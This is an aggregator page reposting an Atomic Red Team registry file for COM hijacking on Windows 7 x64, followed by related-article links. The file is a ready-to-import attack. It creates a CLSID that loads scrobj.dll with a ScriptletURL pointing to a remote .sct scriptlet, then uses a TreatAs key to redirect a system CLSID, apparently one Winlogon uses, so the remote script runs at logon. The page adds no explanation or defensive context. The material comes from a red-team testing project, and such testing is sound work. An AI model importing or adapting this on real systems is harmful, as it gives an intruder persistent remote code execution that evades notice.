text WinLogon Windows 7 x64 COM劫持
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了text WinLogon Windows 7 x64 COM劫持相关的知识,希望对你有一定的参考价值。
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
@="AtomicRedTeam.1.00"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{06DA0625-9701-43DA-BFD7-FBEEA2180A1E}]
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{06DA0625-9701-43DA-BFD7-FBEEA2180A1E}\TreatAs]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
以上是关于text WinLogon Windows 7 x64 COM劫持的主要内容,如果未能解决你的问题,请参考以下文章
Windows NT WinLogon Notify
我们可以获得winlogon屏幕的坐标(x,y),以便在系统中设置任何分辨率吗? (如附图所示)
如何在默认桌面和 Winlogon 桌面之间切换进程?
windows认证原理-ntlm认证
从 Winlogon 桌面切换到用户桌面
为啥我看不到在 Cygwin 之上使用 Python 的 winlogon.exe?